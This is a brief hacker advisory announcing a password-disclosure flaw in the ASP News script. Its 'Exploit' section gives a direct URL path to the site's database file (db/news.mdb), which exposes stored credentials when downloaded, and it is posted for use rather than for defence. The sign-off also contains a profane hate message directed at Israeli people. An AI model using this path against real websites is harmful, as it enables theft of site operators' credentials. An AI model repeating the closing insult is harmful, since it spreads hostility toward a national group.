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ASP News Remote Password Disclouse Vulnerability

# ASP News Remote Password Disclouse Vulnerability                              
# © Ghost Hacker , Real Hack Back                                               
#[~]Author : Ghost Hacker                                                       
#[~]My Home : www.Real-h.com [ Real Hack Back  ]                                
#[~]Contact Me : Ghost-r00t@xxxxxxxxxxx                                         
#[~]Bug : Remote Password Disclouse                                             
#[~]From : Kingdom Saudi Arabia (KSA)                                           
#[~]Name Script : ASP News                                                      
#[~]Download : http://www.toddwoolums.com/aspnews.asp                           
#[~] Dork :                                                                     
# ;)                                                                            
#[~]Exploit :                                                                   
# http://xxxx.com/[Script]/db/news.mdb                                          
#[~]Greets :                                                                    
# Mr.SQL , Mr.SaFa7 , Mr-3sheq , aBo3tB , Night Mare , Root Hacker , Dmar 
al3noOoz , L&J TeaM      #
# HitleR 07 , D3is Hacker , RoMaNcYxHaCkEr , Mr.PaTcH , Mr.MN7oS , Mr.Hope , 
EgYpTiaN x HaCkEr     #
# All Members Real Hack and Members Arab Security , All My Friends !            
#[~]Fuck :                                                                      
# All kidz Hackers , All my Traitors , Israeli people !                         
# I love the Messenger of Allah Mohammad                                        
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